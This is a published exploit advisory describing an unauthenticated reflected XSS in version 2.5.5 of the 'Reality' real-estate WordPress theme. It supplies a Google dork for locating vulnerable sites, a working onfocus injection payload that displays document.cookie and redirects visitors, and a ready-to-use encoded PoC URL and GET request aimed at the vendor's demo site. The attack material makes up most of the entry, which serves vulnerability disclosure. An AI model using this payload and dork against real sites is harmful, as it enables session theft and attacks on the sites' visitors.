Reality | Estate Multipurpose WordPress Theme v2.5.5 - Unauthenticated Reflected XSS

2020.07.18
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: Reality | Estate Multipurpose WordPress Theme v2.5.5 - Unauthenticated Reflected XSS [+] Google Dork: inurl:/wp-content/themes/reality/ [+] Date: 2020-07-15 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: InwaveThemes [ http://inwavethemes.com ] [+] Software Version: 2.5.5 [+] Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected XSS vulnerability was discovered in the Reality theme through 2.5.5 for WordPress. ### [ Payload: ] [$] " autofocus onfocus=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://vladvector.ru`; "> ### [ PoC: ] [!] https://reality.inwavethemes.com/properties/?keyword=%22+autofocus+onfocus%3Dalert(`VL%CE%9BDV%CE%9ECTOR`)%3Balert(document.cookie)%3Bwindow.location%3D`https%3A%2F%2Fvladvector.ru`%3B+%22%3E [!] GET /properties/?keyword=%22+autofocus+onfocus%3Dalert(`VL%CE%9BDV%CE%9ECTOR`)%3Balert(document.cookie)%3Bwindow.location%3D`https%3A%2F%2Fvladvector.ru`%3B+%22%3E HTTP/1.1 Host: reality.inwavethemes.com ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-15-reality-estate-multipurpose-wordpress-theme-v2-5-5.txt
https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top